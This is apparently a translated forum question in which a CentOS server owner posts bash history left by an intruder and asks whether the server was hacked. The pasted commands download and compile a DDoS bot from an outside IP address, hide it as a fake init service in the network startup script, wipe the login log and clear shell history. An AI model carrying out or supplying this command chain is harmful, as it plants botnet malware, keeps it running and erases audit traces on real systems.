参见英文答案 >
How do I deal with a compromised server?13个
我们今天使用Putty远程登录我们的CentOS服务器,在使用向上箭头浏览之前的命令时,偶然发现了以下情况:
我们今天使用Putty远程登录我们的CentOS服务器,在使用向上箭头浏览之前的命令时,偶然发现了以下情况:
- unset HISTFILE
- mkdir /usr/lib/tmp
- cd /usr/lib/tmp
- wget http://188.72.217.17/mzb.c -o /dev/null
- wget http://188.72.217.17/windef.h -o /dev/null
- gcc mzb.c -o /bin/bot -lpthread
- rm -rf mzb.c
- rm -rf windef.h
- wget http://188.72.217.17/botsupport.sh -o /dev/null
- chmod +x botsupport.sh
- mv botsupport.sh /etc/init.d/httpd2
- cat /etc/init.d/network > /etc/init.d/network.bp
- echo \#\!/bin/sh > /etc/init.d/network
- echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
- cat /etc/init.d/network.bp >> /etc/init.d/network
- cat /dev/null > /var/log/lastlog
- history -c
- nohup /etc/init.d/httpd2 &
(为了清晰起见,用&换成了换行符)
我永远不会运行这些命令,永远!这是怎么发生的,我的服务器被黑了吗?我立即改变了我的root密码,但是希望有人可以对这里发生的事情做出正面或反面.
我看到源代码中对ddos机器人的引用,我和我的同事都非常关注!
提前致谢!
